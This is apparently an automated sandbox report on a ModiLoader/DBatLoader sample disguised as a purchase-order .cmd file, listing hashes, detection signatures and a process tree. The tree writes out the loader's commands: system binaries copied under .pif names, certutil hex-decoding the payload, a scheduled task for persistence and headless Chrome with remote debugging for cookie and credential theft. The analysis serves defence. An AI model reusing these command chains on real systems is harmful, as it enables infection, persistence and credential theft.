Analysis
-
max time kernel
141s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 07:03
Static task
static1
Behavioral task
behavioral1
Sample
PO_0908-0989989_RoyalInternationalConstructionL.L.C.cmd
Resource
win10v2004-20250314-en
General
-
Target
PO_0908-0989989_RoyalInternationalConstructionL.L.C.cmd
-
Size
4.4MB
-
MD5
4ccd9114110e590192b6ac291a44aa04
-
SHA1
82a21588f918e98c1624a80cc45a75984a1cdebc
-
SHA256
4d0f4d4b0c4be9677d69985483ef77988e997c47457b26a16609fcc89bad5242
-
SHA512
e0727284c96501044d1d881a03d6e58f0e020656e444a630e9edeef6e68934c243564d48394578a7ff89354771078245d5f3a22f4bdfa1b9e941fe27fad9ab36
-
SSDEEP
49152:JOZm8FVOULlD5339WohAl04mmVC5zVdcwn/eBoKzBHNsARFiB:E
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/2644-54-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-56-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-62-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-72-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-90-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-116-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-114-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-113-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-112-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-110-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-109-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-108-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-107-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-106-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-104-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-102-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-103-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-100-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-98-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-95-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-94-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-88-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-86-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-115-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-84-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-82-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-111-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-81-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-80-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-105-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-79-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-101-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-99-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-77-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-76-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-97-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-96-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-75-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-74-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-93-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-92-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-91-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-89-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-87-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-70-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-69-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-85-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-68-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-66-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-78-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-65-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-64-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-63-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-73-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-71-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-61-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-60-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-59-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-67-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-58-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 behavioral1/memory/2644-57-0x0000000002960000-0x0000000003960000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4032 powershell.exe -
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2080 msedge.exe 3228 Chrome.exe 4696 Chrome.exe 1764 Chrome.exe 1412 Chrome.exe 2708 msedge.exe 2092 Chrome.exe 3608 Chrome.exe 4116 msedge.exe 3480 Chrome.exe 4676 Chrome.exe 1404 Chrome.exe 3704 msedge.exe 772 msedge.exe 2704 msedge.exe 4000 Chrome.exe 3576 Chrome.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rdha.pif Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rundll32.exe -
Executes dropped EXE 14 IoCs
pid Process 4584 expha.pif 3692 expha.pif 3120 expha.pif 4276 alpha.pif 1284 ghf.pif 4612 alpha.pif 3008 ghf.pif 1780 alpha.pif 916 rdha.pif 2644 chrome.PIF 1280 alpha.pif 5104 alpha.pif 2620 Dguhdowe.PIF 6056 Dguhdowe.PIF -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5104 set thread context of 2376 5104 SndVol.exe 142 PID 5104 set thread context of 4872 5104 SndVol.exe 143 PID 5104 set thread context of 1832 5104 SndVol.exe 145 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chrome.PIF Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dguhdowe.PIF Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dguhdowe.PIF -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1780 alpha.pif 2740 PING.EXE 1880 PING.EXE -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry Chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880511040789856" Chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{1429E988-DFAA-4EF1-A941-4231006B050C} msedge.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2740 PING.EXE 1880 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3204 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4032 powershell.exe 2644 chrome.PIF 2644 chrome.PIF 5104 SndVol.exe 5104 SndVol.exe 2376 recover.exe 2376 recover.exe 1832 recover.exe 1832 recover.exe 4000 Chrome.exe 4000 Chrome.exe 2376 recover.exe 2376 recover.exe 5104 SndVol.exe 5104 SndVol.exe 2620 Dguhdowe.PIF 2620 Dguhdowe.PIF -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 5104 SndVol.exe 5104 SndVol.exe 5104 SndVol.exe 5104 SndVol.exe 5104 SndVol.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 4032 powershell.exe Token: SeDebugPrivilege 1832 recover.exe Token: SeShutdownPrivilege 4000 Chrome.exe Token: SeCreatePagefilePrivilege 4000 Chrome.exe Token: SeShutdownPrivilege 4000 Chrome.exe Token: SeCreatePagefilePrivilege 4000 Chrome.exe Token: SeShutdownPrivilege 4000 Chrome.exe Token: SeCreatePagefilePrivilege 4000 Chrome.exe Token: SeShutdownPrivilege 4000 Chrome.exe Token: SeCreatePagefilePrivilege 4000 Chrome.exe Token: SeShutdownPrivilege 4000 Chrome.exe Token: SeCreatePagefilePrivilege 4000 Chrome.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 5104 SndVol.exe 4000 Chrome.exe 4000 Chrome.exe 3704 msedge.exe 3704 msedge.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 5104 SndVol.exe 5104 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2340 wrote to memory of 4032 2340 cmd.exe 88 PID 2340 wrote to memory of 4032 2340 cmd.exe 88 PID 2340 wrote to memory of 1980 2340 cmd.exe 89 PID 2340 wrote to memory of 1980 2340 cmd.exe 89 PID 2340 wrote to memory of 4584 2340 cmd.exe 90 PID 2340 wrote to memory of 4584 2340 cmd.exe 90 PID 2340 wrote to memory of 3692 2340 cmd.exe 91 PID 2340 wrote to memory of 3692 2340 cmd.exe 91 PID 2340 wrote to memory of 3120 2340 cmd.exe 92 PID 2340 wrote to memory of 3120 2340 cmd.exe 92 PID 2340 wrote to memory of 4276 2340 cmd.exe 93 PID 2340 wrote to memory of 4276 2340 cmd.exe 93 PID 4276 wrote to memory of 1284 4276 alpha.pif 94 PID 4276 wrote to memory of 1284 4276 alpha.pif 94 PID 2340 wrote to memory of 4612 2340 cmd.exe 95 PID 2340 wrote to memory of 4612 2340 cmd.exe 95 PID 4612 wrote to memory of 3008 4612 alpha.pif 96 PID 4612 wrote to memory of 3008 4612 alpha.pif 96 PID 2340 wrote to memory of 1780 2340 cmd.exe 100 PID 2340 wrote to memory of 1780 2340 cmd.exe 100 PID 1780 wrote to memory of 2740 1780 alpha.pif 101 PID 1780 wrote to memory of 2740 1780 alpha.pif 101 PID 2340 wrote to memory of 916 2340 cmd.exe 106 PID 2340 wrote to memory of 916 2340 cmd.exe 106 PID 916 wrote to memory of 2644 916 rdha.pif 107 PID 916 wrote to memory of 2644 916 rdha.pif 107 PID 916 wrote to memory of 2644 916 rdha.pif 107 PID 2340 wrote to memory of 4012 2340 cmd.exe 108 PID 2340 wrote to memory of 4012 2340 cmd.exe 108 PID 2644 wrote to memory of 3700 2644 chrome.PIF 112 PID 2644 wrote to memory of 3700 2644 chrome.PIF 112 PID 2644 wrote to memory of 3700 2644 chrome.PIF 112 PID 2644 wrote to memory of 3932 2644 chrome.PIF 113 PID 2644 wrote to memory of 3932 2644 chrome.PIF 113 PID 2644 wrote to memory of 3932 2644 chrome.PIF 113 PID 3700 wrote to memory of 3432 3700 cmd.exe 116 PID 3700 wrote to memory of 3432 3700 cmd.exe 116 PID 3700 wrote to memory of 3432 3700 cmd.exe 116 PID 3932 wrote to memory of 1880 3932 cmd.exe 117 PID 3932 wrote to memory of 1880 3932 cmd.exe 117 PID 3932 wrote to memory of 1880 3932 cmd.exe 117 PID 3700 wrote to memory of 1280 3700 cmd.exe 118 PID 3700 wrote to memory of 1280 3700 cmd.exe 118 PID 3700 wrote to memory of 1280 3700 cmd.exe 118 PID 3700 wrote to memory of 5104 3700 cmd.exe 119 PID 3700 wrote to memory of 5104 3700 cmd.exe 119 PID 3700 wrote to memory of 5104 3700 cmd.exe 119 PID 2644 wrote to memory of 3604 2644 chrome.PIF 120 PID 2644 wrote to memory of 3604 2644 chrome.PIF 120 PID 2644 wrote to memory of 3604 2644 chrome.PIF 120 PID 3604 wrote to memory of 3204 3604 cmd.exe 124 PID 3604 wrote to memory of 3204 3604 cmd.exe 124 PID 3604 wrote to memory of 3204 3604 cmd.exe 124 PID 2644 wrote to memory of 5104 2644 chrome.PIF 126 PID 2644 wrote to memory of 5104 2644 chrome.PIF 126 PID 2644 wrote to memory of 5104 2644 chrome.PIF 126 PID 2644 wrote to memory of 5104 2644 chrome.PIF 126 PID 4000 wrote to memory of 3360 4000 Chrome.exe 136 PID 4000 wrote to memory of 3360 4000 Chrome.exe 136 PID 4000 wrote to memory of 3768 4000 Chrome.exe 137 PID 4000 wrote to memory of 3768 4000 Chrome.exe 137 PID 4000 wrote to memory of 3768 4000 Chrome.exe 137 PID 4000 wrote to memory of 3768 4000 Chrome.exe 137 PID 4000 wrote to memory of 3768 4000 Chrome.exe 137
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO_0908-0989989_RoyalInternationalConstructionL.L.C.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\Libraries\\expha.pif"2⤵PID:1980
-
-
C:\Users\Public\Libraries\expha.pifC:\\Users\\Public\\Libraries\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\Libraries\\alpha.pif"2⤵
- Executes dropped EXE
PID:4584
-
-
C:\Users\Public\Libraries\expha.pifC:\\Users\\Public\\Libraries\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\Libraries\\rdha.pif"2⤵
- Executes dropped EXE
PID:3692
-
-
C:\Users\Public\Libraries\expha.pifC:\\Users\\Public\\Libraries\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\Libraries\\ghf.pif"2⤵
- Executes dropped EXE
PID:3120
-
-
C:\Users\Public\Libraries\alpha.pifC:\\Users\\Public\\Libraries\\alpha.pif /C C:\\Users\\Public\\Libraries\\ghf.pif -decodehex -f "C:\Users\Admin\AppData\Local\Temp\PO_0908-0989989_RoyalInternationalConstructionL.L.C.cmd" "C:\Users\Public\\Libraries\donex.avi" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Public\Libraries\ghf.pifC:\\Users\\Public\\Libraries\\ghf.pif -decodehex -f "C:\Users\Admin\AppData\Local\Temp\PO_0908-0989989_RoyalInternationalConstructionL.L.C.cmd" "C:\Users\Public\\Libraries\donex.avi" 93⤵
- Executes dropped EXE
PID:1284
-
-
-
C:\Users\Public\Libraries\alpha.pifC:\\Users\\Public\\Libraries\\alpha.pif /C C:\\Users\\Public\\Libraries\\ghf.pif -decodehex -f "C:\Users\Public\\Libraries\donex.avi" "C:\Users\Public\\Libraries\chrome.PIF" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Public\Libraries\ghf.pifC:\\Users\\Public\\Libraries\\ghf.pif -decodehex -f "C:\Users\Public\\Libraries\donex.avi" "C:\Users\Public\\Libraries\chrome.PIF" 123⤵
- Executes dropped EXE
PID:3008
-
-
-
C:\Users\Public\Libraries\alpha.pifC:\\Users\\Public\\Libraries\\alpha.pif /c PING -n 4 127.0.0.12⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\PING.EXEPING -n 4 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2740
-
-
-
C:\Users\Public\Libraries\rdha.pifC:\\Users\\Public\\Libraries\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\\Libraries\chrome.PIF2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Public\Libraries\chrome.PIF"C:\Users\Public\Libraries\chrome.PIF"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\672.cmd4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o5⤵PID:3432
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\31419.cmd4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 105⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\623.cmd4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Dguhdowe" /tr C:\\ProgramData\\Dguhdowe.url"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3204
-
-
-
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5104 -
C:\Program Files\Google\Chrome\Application\Chrome.exe--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffed0a1dcf8,0x7ffed0a1dd04,0x7ffed0a1dd106⤵PID:3360
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1868,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1860 /prefetch:26⤵PID:3768
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --field-trial-handle=2220,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2216 /prefetch:36⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --field-trial-handle=2352,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2348 /prefetch:86⤵PID:3492
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:16⤵
- Uses browser remote debugging
PID:3228
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:16⤵
- Uses browser remote debugging
PID:3480
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4424,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4420 /prefetch:86⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4772,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4768 /prefetch:86⤵PID:2184
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4928,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4924 /prefetch:16⤵
- Uses browser remote debugging
PID:2092
-
-
